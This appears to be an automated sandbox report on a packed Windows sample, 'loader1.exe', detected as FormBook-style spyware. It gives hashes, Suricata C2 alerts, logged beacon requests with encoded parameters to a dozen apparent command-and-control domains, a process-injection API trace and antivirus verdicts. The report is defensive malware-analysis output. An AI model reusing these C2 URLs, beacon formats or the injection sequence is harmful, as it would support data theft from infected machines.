popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

loader1.exe

NSIS Generic Malware Malicious Library UPX PE File DLL PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 29, 2021, 9:26 a.m. Oct. 29, 2021, 9:49 a.m.
Size 247.3KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 d2664cef24240dc8eb16f39c37228757
SHA256 5264dba5e023d5b63d57197b4efc1d105083c9b4d84d754ea5a4d1f5823c9cb6
CRC32 0ADDD181
ssdeep 6144:wBlL/cx/QoEPBRrtCp9yOTiOfQZLEmh0VGqx:CelqBCfGPLtQ3x
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • NSIS_Installer - Null Soft Installer

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49231 -> 23.230.206.51:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49231 -> 23.230.206.51:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49231 -> 23.230.206.51:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 143.95.1.174:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 143.95.1.174:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 143.95.1.174:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49223 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49223 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49223 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
UDP 192.168.56.101:50851 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 104.233.161.7:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 43.129.169.28:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49221 -> 43.129.169.28:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49221 -> 43.129.169.28:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49221 -> 43.129.169.28:80 2031089 ET HUNTING Request to .TOP Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49229 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49229 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 104.233.161.7:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 104.233.161.7:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 104.233.161.7:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 104.233.161.7:80 2031089 ET HUNTING Request to .TOP Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 3.223.115.185:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49227 -> 3.223.115.185:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49227 -> 3.223.115.185:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 88.214.207.96:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 88.214.207.96:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 88.214.207.96:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 89.191.148.30:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 88.214.207.96:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 89.191.148.30:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.98.99.30:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 89.191.148.30:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.98.99.30:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 34.98.99.30:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 107.180.0.6:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 107.180.0.6:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 107.180.0.6:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 3.64.163.50:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 3.64.163.50:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 3.64.163.50:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.egyptian-museum.com/ga6b/?lDKXxv3=CYKd0A9ffzzmh+HMixfnmJt+Ibe3PgwQT1IowcrJSMkSzDwRXwABXy8G05QumwrEDOfj2gVO&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.szkoleniawcag.online/ga6b/?lDKXxv3=gnsA4ZbKwcCBT4B1BZOwnz85wF4eeNbRrbSFWu41EJQIcvRDWo1d+7UOhMG+MofppSWBY2n5&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.gritzcharlestonluxuryinn.store/ga6b/?lDKXxv3=I7+lOFJZANFPU21x37A527c95H/aJlATolxoDPbL88ZB7wUaWO1fPidq8y9dbqc40d5vraaW&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.nobodybutgod.com/ga6b/?lDKXxv3=BS+Mkr60hnaz2VUqn6F4jElENEwbATWztr1txOlCDy4YTJ8rldrX7GuvTHEqc04l9LT0WVoV&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.afghantattoos.com/ga6b/?lDKXxv3=2Ru1HfNJkzg9zqDfItmBkvjjxlVS0LNfThNY9X9fgrCeE16wu3v6AqM2D0FDDG0AnjNX5uQ/&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.mystudentregistration.com/ga6b/?lDKXxv3=FVoCe1A8hVjRCYMBrNnCX0kDnu+C161o3wWxJxzL6alfMQ3NhDSyui/P1g/HSSLfHx6+Mmre&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.corvusexpeditii.xyz/ga6b/?lDKXxv3=7T8vebYEf2GnHvqeOh/0TgFFgNzfckxTcBNzZeSGzjlNLlbJ9NDPNSTqSdLNqh5j9wLWy4Dd&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.qqcx666888.top/ga6b/?lDKXxv3=eIOqojsK4xpnapytTTDNeQQlEQNyaN45Mu2frT25CMa88Pt4x/OA2saBEpBSOPq2dGKSSZM3&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.belledescontos.com/ga6b/?lDKXxv3=jgYBUTBv6juzDCabe4OWCqutfSnVgXfaFkkijkSn/1f1jJLEA2ITjcU5AEV22xDLWIcCZZOm&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.onra.top/ga6b/?lDKXxv3=oElzuWp1f34WuFFQH0ElFrJlzB2XRtqeKiQMWTUoMD39vhgZ+y+e3BJkM1IQMs1XY69eCkQ6&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.soulwinningministry.com/ga6b/?lDKXxv3=QlWlhrdmA38F39wdH59qDKgCLzke0jtbLkghOfWKUCAF1Rx/+ASUr0tJhxHvOSZs2DWzt0F9&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.infinityrope.store/ga6b/?lDKXxv3=L/c9eZQCXLd/YVoAQOP3tZ3B8nNkn+pww7YQb0Xhol9/59b8TqV7CKFWTb/5H/3WmVOflfic&Kzux=PnjtLHyHSr
suspicious_features GET method with no useragent header suspicious_request GET http://www.acacave.com/ga6b/?lDKXxv3=LZj7dIufhWlgov4/daUw8E4ZVYKGDHaQ4e5klmj4Sj863sAeUYBdGT0Z9uhDs1Zyx3HrxG1c&Kzux=PnjtLHyHSr
request POST http://www.egyptian-museum.com/ga6b/
request GET http://www.egyptian-museum.com/ga6b/?lDKXxv3=CYKd0A9ffzzmh+HMixfnmJt+Ibe3PgwQT1IowcrJSMkSzDwRXwABXy8G05QumwrEDOfj2gVO&Kzux=PnjtLHyHSr
request POST http://www.szkoleniawcag.online/ga6b/
request GET http://www.szkoleniawcag.online/ga6b/?lDKXxv3=gnsA4ZbKwcCBT4B1BZOwnz85wF4eeNbRrbSFWu41EJQIcvRDWo1d+7UOhMG+MofppSWBY2n5&Kzux=PnjtLHyHSr
request POST http://www.gritzcharlestonluxuryinn.store/ga6b/
request GET http://www.gritzcharlestonluxuryinn.store/ga6b/?lDKXxv3=I7+lOFJZANFPU21x37A527c95H/aJlATolxoDPbL88ZB7wUaWO1fPidq8y9dbqc40d5vraaW&Kzux=PnjtLHyHSr
request POST http://www.nobodybutgod.com/ga6b/
request GET http://www.nobodybutgod.com/ga6b/?lDKXxv3=BS+Mkr60hnaz2VUqn6F4jElENEwbATWztr1txOlCDy4YTJ8rldrX7GuvTHEqc04l9LT0WVoV&Kzux=PnjtLHyHSr
request POST http://www.afghantattoos.com/ga6b/
request GET http://www.afghantattoos.com/ga6b/?lDKXxv3=2Ru1HfNJkzg9zqDfItmBkvjjxlVS0LNfThNY9X9fgrCeE16wu3v6AqM2D0FDDG0AnjNX5uQ/&Kzux=PnjtLHyHSr
request POST http://www.mystudentregistration.com/ga6b/
request GET http://www.mystudentregistration.com/ga6b/?lDKXxv3=FVoCe1A8hVjRCYMBrNnCX0kDnu+C161o3wWxJxzL6alfMQ3NhDSyui/P1g/HSSLfHx6+Mmre&Kzux=PnjtLHyHSr
request POST http://www.corvusexpeditii.xyz/ga6b/
request GET http://www.corvusexpeditii.xyz/ga6b/?lDKXxv3=7T8vebYEf2GnHvqeOh/0TgFFgNzfckxTcBNzZeSGzjlNLlbJ9NDPNSTqSdLNqh5j9wLWy4Dd&Kzux=PnjtLHyHSr
request POST http://www.qqcx666888.top/ga6b/
request GET http://www.qqcx666888.top/ga6b/?lDKXxv3=eIOqojsK4xpnapytTTDNeQQlEQNyaN45Mu2frT25CMa88Pt4x/OA2saBEpBSOPq2dGKSSZM3&Kzux=PnjtLHyHSr
request POST http://www.belledescontos.com/ga6b/
request GET http://www.belledescontos.com/ga6b/?lDKXxv3=jgYBUTBv6juzDCabe4OWCqutfSnVgXfaFkkijkSn/1f1jJLEA2ITjcU5AEV22xDLWIcCZZOm&Kzux=PnjtLHyHSr
request POST http://www.onra.top/ga6b/
request GET http://www.onra.top/ga6b/?lDKXxv3=oElzuWp1f34WuFFQH0ElFrJlzB2XRtqeKiQMWTUoMD39vhgZ+y+e3BJkM1IQMs1XY69eCkQ6&Kzux=PnjtLHyHSr
request POST http://www.soulwinningministry.com/ga6b/
request GET http://www.soulwinningministry.com/ga6b/?lDKXxv3=QlWlhrdmA38F39wdH59qDKgCLzke0jtbLkghOfWKUCAF1Rx/+ASUr0tJhxHvOSZs2DWzt0F9&Kzux=PnjtLHyHSr
request POST http://www.infinityrope.store/ga6b/
request GET http://www.infinityrope.store/ga6b/?lDKXxv3=L/c9eZQCXLd/YVoAQOP3tZ3B8nNkn+pww7YQb0Xhol9/59b8TqV7CKFWTb/5H/3WmVOflfic&Kzux=PnjtLHyHSr
request POST http://www.acacave.com/ga6b/
request GET http://www.acacave.com/ga6b/?lDKXxv3=LZj7dIufhWlgov4/daUw8E4ZVYKGDHaQ4e5klmj4Sj863sAeUYBdGT0Z9uhDs1Zyx3HrxG1c&Kzux=PnjtLHyHSr
request POST http://www.egyptian-museum.com/ga6b/
request POST http://www.szkoleniawcag.online/ga6b/
request POST http://www.gritzcharlestonluxuryinn.store/ga6b/
request POST http://www.nobodybutgod.com/ga6b/
request POST http://www.afghantattoos.com/ga6b/
request POST http://www.mystudentregistration.com/ga6b/
request POST http://www.corvusexpeditii.xyz/ga6b/
request POST http://www.qqcx666888.top/ga6b/
request POST http://www.belledescontos.com/ga6b/
request POST http://www.onra.top/ga6b/
request POST http://www.soulwinningministry.com/ga6b/
request POST http://www.infinityrope.store/ga6b/
request POST http://www.acacave.com/ga6b/
domain www.qqcx666888.top description Generic top level domain TLD
domain www.onra.top description Generic top level domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x728d2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73795000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2244
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00820000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nst64CE.tmp\ozajwm.dll
file C:\Users\test22\AppData\Local\Temp\nst64CE.tmp\ozajwm.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2244
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000214
1 0 0
Process injection Process 1896 called NtSetContextThread to modify thread in remote process 2244
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314336
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000210
process_identifier: 2244
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2264
thread_handle: 0x00000210
process_identifier: 2244
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\loader1.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\loader1.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\loader1.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000214
1 1 0

NtGetContextThread

 thread_handle: 0x00000210
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2244
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000214
1 0 0

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314336
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000210
process_identifier: 2244
1 0 0
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.NSISX.Spy.Gen.2
FireEye Generic.mg.d2664cef24240dc8
Cylance Unsafe
Sangfor Suspicious.Win32.Save.a
Arcabit Zum.Androm.1
Cyren W32/Injector.ANV.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Injector.EQKJ
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.NSISX.Spy.Gen.2
Avast Win32:PWSX-gen [Trj]
Sophos Generic ML PUA (PUA)
DrWeb Trojan.Packed2.43581
McAfee-GW-Edition BehavesLike.Win32.Vopak.dc
Emsisoft Trojan.NSISX.Spy.Gen.2 (B)
Ikarus Trojan.NSIS.Agent.S
Microsoft Trojan:Win32/Lokibot.SISN!MTB
ZoneAlarm UDS:DangerousObject.Multi.Generic
GData Zum.Androm.1
Cynet Malicious (score: 100)
BitDefenderTheta Gen:NN.ZedlaF.34236.bu4@amjGbCfi
MAX malware (ai score=88)
SentinelOne Static AI - Malicious PE
Fortinet W32/Injector_AGen.AW!tr
AVG Win32:PWSX-gen [Trj]
Cybereason malicious.f24240
Panda Trj/CI.A